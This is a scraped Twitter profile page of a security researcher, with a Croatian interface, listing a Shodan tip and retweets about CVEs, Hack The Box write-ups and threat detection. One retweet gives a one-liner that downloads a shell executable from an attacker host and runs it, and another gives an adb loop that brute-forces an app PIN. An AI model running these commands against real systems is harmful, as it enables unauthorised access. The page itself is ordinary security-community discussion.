0xba3ba4

@0xba3ba4

Electronic engineer. I hack vulnerable devices for a better world. All opinions are my own. Retweets are not endorsement. Cybersec related account of .

127.0.0.1
Vrijeme pridruživanja: listopad 2016.

Tweetovi

Blokirali ste korisnika/cu @0xba3ba4

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0xba3ba4

  1. Prikvačeni tweet
    25. svi 2019.

    One of very helpful and not very well known Shodan filter is “http.favicon.hash”. It calculates hash of favicon.ico image and search for exactly this same value, which returns websites running the same target software or service.

    Poništi
  2. proslijedio/la je Tweet
    prije 8 sati

    Cisco Discovery Protocol (CDP) enabled devices are vulnerable to Denial-of-Service (DoS) and Remote Code Execution (RCE) 👏👏👏 CVE-2020-3110 CVE-2020-3111 CVE-2020-3118 CVE-2020-3119 CVE-2020-3120 Note: Hacking Video:

    , , i još njih 6
    Poništi
  3. proslijedio/la je Tweet

    A new security flaw (CVE-2020-6007) in Philips Smart Light Bulbs 💡 could let remote attackers gain access to your entire WiFi network (over-the-air without cracking password) & launch further attacks against other devices connected to the same. Details:

    Poništi
  4. proslijedio/la je Tweet
    2. velj

    Uses a New Windows 10 UAC Bypass to Launch Quietly

    Poništi
  5. proslijedio/la je Tweet
    22. sij

    play starts Jan. 30 at noon EST (U.S. time). Find teammates in the -ctf channel on Slack.

    Poništi
  6. proslijedio/la je Tweet

    Yet Another Sudo ! When 'pwfeedback' is enabled, a new Sudo bug could let low privileged & users (or malicious programs) execute arbitrary commands with 'root' privileges. Details for CVE-2019-18634 ➤

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    1. velj

    Here's my write-up for the retired from HTB. Created by . Dropping web shells from EvilWinRar, yo!

    Poništi
  8. proslijedio/la je Tweet
    1. velj

    Another box solved the unintended way: RE. Once I had RCE after dropping an aspx webshell with the Winrar CVE, I used the UsoSvc service to gain SYSTEM and impersonated the Coby user to decrypt the root flag. Great box by .

    Poništi
  9. proslijedio/la je Tweet
    1. velj

    RE just retired from . As the creator of the box, I tried to bring phishing/macro obfuscation concepts to the initial access. The intended privescs were the WinRar ACE file exploit, and XXE in Ghidra. I'll show two unintended privescs too.

    Poništi
  10. 31. sij

    Public Methodologies for Identifying Cobalt Strike Team Servers.

    Poništi
  11. proslijedio/la je Tweet
    30. sij

    A machine a day keeps the doctor away 🍏 Fatty will go live Feb 1 2020 at 19:00:00 UTC. RE will be retired! You still have time to hack your way in at

    Poništi
  12. proslijedio/la je Tweet
    28. sij
    Poništi
  13. proslijedio/la je Tweet
    27. sij

    If there is no rate limit on PIN functionality of Android APK ,but the app is protected by every mechanism, then try to brute Force using adb . for i in {0000..9999}; do adb shell input text ; done #600$

    Poništi
  14. proslijedio/la je Tweet
    28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    14. sij

    NEW: We examined in detail how 10 popular smartphone apps secretly share extensive personal information with at least 135 companies, systematically breaking EU data protection law. This must end. Two massive reports + legal complaints against 6 companies:

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    26. sij
    Poništi
  17. proslijedio/la je Tweet
    25. sij

    The 28th HTB box I solve in preparation for the OSCP. Initial Foothold - FTP anon login + cleartext creds Privilege Escalation - RCE vuln associated with H2 database version that was being run with root privileges

    Poništi
  18. proslijedio/la je Tweet
    25. sij

    AI video is now online. A really cool "out of band" style of an SQL Injection using "Speech To Text". So you need to Verbally Speak out the injection. Once on the box do a pretty cool privesc via Java Debugging.

    Poništi
  19. proslijedio/la je Tweet
    25. sij
    Poništi
  20. proslijedio/la je Tweet
    25. sij

    One more writeup for AI from is up: That SQL injection using text-to-speech gave me a hard time.

    Poništi
  21. proslijedio/la je Tweet
    25. sij

    AI from just retired. SQLi through a speech recognition application and code execution as root through a jdwp internal service. Here's my write-up:

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·